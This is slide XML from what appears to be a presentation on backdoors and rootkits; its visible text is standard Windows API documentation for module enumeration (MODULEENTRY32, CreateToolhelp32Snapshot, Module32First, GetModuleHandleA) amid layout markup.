              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:normAutofit fontScale="875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10BDCC"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                    <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                    <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  </a:rPr>
                  <a:t>02</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="10BDCC"/>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18" name="文本框 17"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6979"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Backdoors</a:t>
                </a:r>
                <a:endPar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19" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="3057"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="圆角矩形 19"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483" cy="1776"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF4338"/>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2" name="椭圆 14"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>
                <a:ext cx="2014" cy="2014"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="E80A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3" name="椭圆 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>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4" name="文本框 26"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1864" y="2665"/>
                <a:ext cx="1736" cy="949"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:normAutofit fontScale="875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rPr>
                  <a:t>01</a:t>
                </a:r>
                <a:endPar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25" name="文本框 27"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6980"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sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Rootkits</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:sym typeface="+mn-lt"/>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MODULEENTRY32</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5873115" y="2952750"/>
            <a:ext cx="6169660" cy="3350895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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dwSize</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 size of the structure, in bytes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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th32ProcessID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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 identifier of the process whose modules are to be examined.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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modBaseAddr</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 base address of the module in the context of the owning process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A handle to the module in the context of the owning process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>szModule[MAX_MODULE_NAME32 + 1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The module name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197485" y="1170940"/>
            <a:ext cx="5577205" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct tagMODULEENTRY32 {</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DWORD   dwSize;</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DWORD   th32ModuleID;</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DWORD   th32ProcessID;</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DWORD   GlblcntUsage;</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DWORD   ProccntUsage;</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BYTE    *modBaseAddr;</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DWORD   modBaseSize;</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HMODULE hModule;</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char    szModule[MAX_MODULE_NAME32 + 1];</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char    szExePath[MAX_PATH];</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MODULEENTRY32;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1170940"/>
            <a:ext cx="5744210" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
            <a:chExt cx="9046" cy="2482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10385" y="2770"/>
              <a:ext cx="9047" cy="2482"/>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10502" y="2957"/>
              <a:ext cx="8813" cy="2107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Describes an entry from a list of the modules belonging to the specified process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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CreateToolhelp32Snapshot</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267970" y="4163060"/>
            <a:ext cx="11655425" cy="1699895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] dwFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>The portions of the system to be included in the snapshot.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] th32ProcessID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>The process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793115" y="1235075"/>
            <a:ext cx="5170805" cy="2453640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HANDLE CreateToolhelp32Snapshot(</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  [in] DWORD dwFlags,</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  [in] DWORD th32ProcessID</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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157595" y="1224280"/>
            <a:ext cx="5883275" cy="2464435"/>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6290310" y="1372235"/>
            <a:ext cx="5617845" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="270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Module32First</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267970" y="4163060"/>
            <a:ext cx="11655425" cy="1699895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] hSnapshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>A handle to the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in, out] lpme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>A pointer to a MODULEENTRY32 structure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793115" y="1235075"/>
            <a:ext cx="5170805" cy="2453640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>BOOL Module32First(</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  [in]      HANDLE          hSnapshot,</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  [in, out] LPMODULEENTRY32 lpme</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1578610"/>
            <a:ext cx="5882640" cy="1766570"/>
            <a:chOff x="9697" y="1928"/>
            <a:chExt cx="9264" cy="2782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="1928"/>
              <a:ext cx="9265" cy="2782"/>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9906" y="2230"/>
              <a:ext cx="8847" cy="2179"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Retrieves information about the first module associated with a process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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GetModuleHandleA</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267970" y="4163060"/>
            <a:ext cx="11655425" cy="1699895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in, optional] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Bold" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman Bold" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lpModuleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>The name of the loaded module (either a .dll or .exe file).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793115" y="1235075"/>
            <a:ext cx="5170805" cy="1863090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
